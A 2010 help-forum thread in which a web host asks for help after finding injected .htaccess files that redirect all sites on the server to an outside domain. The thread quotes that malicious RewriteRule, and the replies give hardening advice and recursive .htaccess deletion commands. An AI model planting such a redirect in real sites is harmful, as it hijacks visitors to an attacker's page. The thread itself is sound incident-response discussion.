Only on Experts-Exchange: Sign-up for a free-trial and we'll send you your permanent license!
Here is what you get: 30 Nodes | Unlimited Sensors | No Time Restrictions | Absolutely FREE!
Act now. This offer ends July 14, 2017.
Course Of The Month
5 days, 18 hours left to enrollBecome a Premium Member and unlock a new, free course in leading technologies each month.
Solved
I was hacked - apache -webhosting
Posted on 2010-08-18
Hi,
I have all websites on my server redirected to nonsense IP address.
1. It is not dns, since I have my clients on different registrars
2. it is not mysql because even simple pages are redirected
3. dns ping from my domains give me correct = my IP address
Heeeelp, please urgently or I am dead.
I have all websites on my server redirected to nonsense IP address.
1. It is not dns, since I have my clients on different registrars
2. it is not mysql because even simple pages are redirected
3. dns ping from my domains give me correct = my IP address
Heeeelp, please urgently or I am dead.
[X]
Welcome to Experts Exchange
Add your voice to the tech community where 5M+ people just like you are talking about what matters.
- Help others & share knowledge
- Earn cash & points
- Learn & ask questions
-
9
-
4
- +1
15 Comments
Hello,
I would suggest you to check you website pages as it might possible that someone injected malicious scripts in them. Also scan your server for viruses or any backdoor.
I would suggest you to check you website pages as it might possible that someone injected malicious scripts in them. Also scan your server for viruses or any backdoor.
I checked my folders in my Inetpub and noticed that all folders have the fresh date 18 August 2: and so.
I am finding this file: .htaccess with this inside:
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://musikkorps.com/mainfile.php
the file is in apache, am searching for more
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://musikkorps.com/mainfile.php
the file is in apache, am searching for more
this file is everywhere in my inetpub folders. i am removing it but how can I prevent it for the next time?
QUESTION: since it is endless amount of this file spread in my inetpub directory, what is the crucial location, i.e. where should I go first to remove it so as the websites will function again?
Ok, the answer is to remove it from the www root.
ANOTHER QUESTION:
is there a php script available I can use to dele htaccess files from todays date in one step?
ANOTHER QUESTION:
is there a php script available I can use to dele htaccess files from todays date in one step?
To prevent this particular attack happening again, the easy fix is to add " AllowOverride None" to your apache config, this will prevent apache from using .htaccess files. If you do not use .htaccess files anywhere and want to delete them, you could just use a bash script to remove any (though it would be better to have all directories as read only for the apache user):
# find and remove all .htaccess files under /var/www
find /var/www/ -name '.htaccess' -exec rm {} \;
To make your directories read only, you could chmod ugo-w {directory} (add -r to make it recursive and change all directories). Some apps will need a few directories to be writeable, eg for cache, uploads etc, so be careful when changing directory permissions.
Have a look at http://httpd.apache.org/docs/current/misc/security_tips.html for some other good security tips.
# find and remove all .htaccess files under /var/www
find /var/www/ -name '.htaccess' -exec rm {} \;
To make your directories read only, you could chmod ugo-w {directory} (add -r to make it recursive and change all directories). Some apps will need a few directories to be writeable, eg for cache, uploads etc, so be careful when changing directory permissions.
Have a look at http://httpd.apache.org/docs/current/misc/security_tips.html for some other good security tips.
Have you checked Joomla and any of the makers of the plugins for patches to address security issues?
On windows you could make a batch file that runs
cd \your\web\root <- replace with inetpub or your webroot path
del /S .htaccess
This will recursively delete all .htaccess files (I have not tested this as I dont have a windows computer to play with, so try it first where it wont destroy things!). You could then add this as a scheduled task to run every day/hour etc
cd \your\web\root <- replace with inetpub or your webroot path
del /S .htaccess
This will recursively delete all .htaccess files (I have not tested this as I dont have a windows computer to play with, so try it first where it wont destroy things!). You could then add this as a scheduled task to run every day/hour etc
You could write the htaccess stuff into the virtual host configurations for apache, instead of using htaccess files, it sounds like these may have been overwritten anyway, so it may be time for restoring your backups. Another way around it would be to restore the .htaccess files, then use windows file permissions to remove write access to them. If you cannot avoid htaccess files, restore and permission is the only way I can think of to get around this.
is there a way how to forbid overwritting .httaccess in general config of apache?
(I have windows).
I do not want to do it od windows folder level manualy since I have a lot of files.
(I have windows).
I do not want to do it od windows folder level manualy since I have a lot of files.
Featured Post
MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.
Question has a verified solution.
If you are experiencing a similar issue, please ask a related question
If you've heard about htaccess and it sounds like it does what you want, but you're not sure how it works... well, you're in the right place. Read on.
Some Basics
#1. It's a file and its filename is .htaccess (yes, with a dot in the front).
#…
Lease-to-own eliminates the expenditure of hardware replacement and allows you to pay off the server over time. Usually, this is much cheaper than leasing servers. Think of lease-to-own as credit without interest.
Come and listen to Percona CEO Peter Zaitsev discuss what’s new in Percona open source software, including Percona Server for MySQL (https://www.percona.com/software/mysql-database/percona-server) and MongoDB (https://www.percona.com/software/mongo-…
In this brief tutorial Pawel from AdRem Software explains how you can quickly find out which services are running on your network, or what are the IP addresses of servers responsible for each service. Software used is freeware NetCrunch Tools (https…
Suggested Courses
Course of the Month5 days, 18 hours left to enroll
707 members asked questions and received personalized solutions in the past 7 days.
Join the community of 500,000 technology professionals and ask your questions.